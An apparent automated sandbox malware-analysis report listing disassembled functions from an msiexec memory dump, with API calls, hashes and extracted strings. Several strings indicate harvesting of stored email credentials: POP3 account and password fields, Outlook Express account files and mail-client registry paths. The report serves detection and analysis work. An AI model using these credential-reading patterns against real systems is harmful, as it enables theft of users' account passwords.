                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                                          • String ID: %s@yahoo.com
                                                                                                          • API String ID: 2240714685-3288273942
                                                                                                          • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                          • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                          • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                          • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                          • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                          • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                          • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                            • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                          • API String ID: 888011440-2039793938
                                                                                                          • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                          • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                          • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                          • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                          APIs
                                                                                                            • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                          • strchr.MSVCRT ref: 0040327B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileStringstrchr
                                                                                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                          • API String ID: 1348940319-1729847305
                                                                                                          • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                          • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                          • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                          • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                          APIs
                                                                                                          • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                          • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                          • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy
                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                          • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                          • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                          • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                          • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040F567
                                                                                                          • memset.MSVCRT ref: 0040F57F
                                                                                                            • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                          • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 78143705-3916222277
                                                                                                          • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                          • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                          • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                          • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                            • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                            • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                          • strchr.MSVCRT ref: 0040371F
                                                                                                          • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                          • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                          • strlen.MSVCRT ref: 00403778
                                                                                                          • sprintf.MSVCRT ref: 0040379C
                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                          • String ID: %s@gmail.com
                                                                                                          • API String ID: 3261640601-4097000612
                                                                                                          • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                          • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                          • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                          • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004094C8
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                          • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                          • memset.MSVCRT ref: 0040950C
                                                                                                          • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                          • _strcmpi.MSVCRT ref: 00409531
                                                                                                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                          • String ID: sysdatetimepick32
                                                                                                          • API String ID: 3411445237-4169760276
                                                                                                          • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                          • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                          • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                          • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00403504
                                                                                                          • memset.MSVCRT ref: 0040351A
                                                                                                          • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                          • _mbscat.MSVCRT ref: 0040356D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbscatmemset$_mbscpystrlen
                                                                                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                          • API String ID: 632640181-966475738
                                                                                                          • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                          • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                          • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                          • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                          APIs
                                                                                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                          • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                          • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                          • String ID:
                                                                                                          • API String ID: 3642520215-0
                                                                                                          • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                          • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                          • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                          • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                          APIs
                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                          • GetDC.USER32(00000000), ref: 004072FB
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                          • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                          • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 1999381814-0
                                                                                                          • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                          • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                          • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                          • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpymemset
                                                                                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                          • API String ID: 1297977491-3883738016
                                                                                                          • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                          • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                          • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                          • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                          APIs
                                                                                                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                            • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                            • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                            • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                            • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memset
                                                                                                          • String ID: gj
                                                                                                          • API String ID: 438689982-4203073231
                                                                                                          • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                          • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                          • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                          • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __aulldvrm$__aullrem
                                                                                                          • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                          • API String ID: 643879872-978417875
                                                                                                          • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                          • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                          • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                          • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040810E
                                                                                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,67CE7B60,?), ref: 004081B9
                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                          • API String ID: 524865279-2190619648
                                                                                                          • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                          • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                          • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                          • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                          • String ID: 0$6
                                                                                                          • API String ID: 2300387033-3849865405
                                                                                                          • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                          • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                          • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                          • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004076D7
                                                                                                          • sprintf.MSVCRT ref: 00407704
                                                                                                          • strlen.MSVCRT ref: 00407710
                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                          • strlen.MSVCRT ref: 00407733
                                                                                                          • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpystrlen$memsetsprintf
                                                                                                          • String ID: %s (%s)
                                                                                                          • API String ID: 3756086014-1363028141
                                                                                                          • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                          • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                          • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                          • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbscat$memsetsprintf
                                                                                                          • String ID: %2.2X
                                                                                                          • API String ID: 125969286-791839006
                                                                                                          • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                          • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                          • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                          • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                          APIs
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                            • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                            • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                            • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                            • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                            • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                            • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                            • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                          • String ID: ACD
                                                                                                          • API String ID: 82305771-620537770
                                                                                                          • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                          • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                          • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                          • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004091EC
                                                                                                          • sprintf.MSVCRT ref: 00409201
                                                                                                            • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                            • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                            • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                          • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                          • String ID: caption$dialog_%d
                                                                                                          • API String ID: 2923679083-4161923789
                                                                                                          • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                          • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                          • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                          • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                          APIs
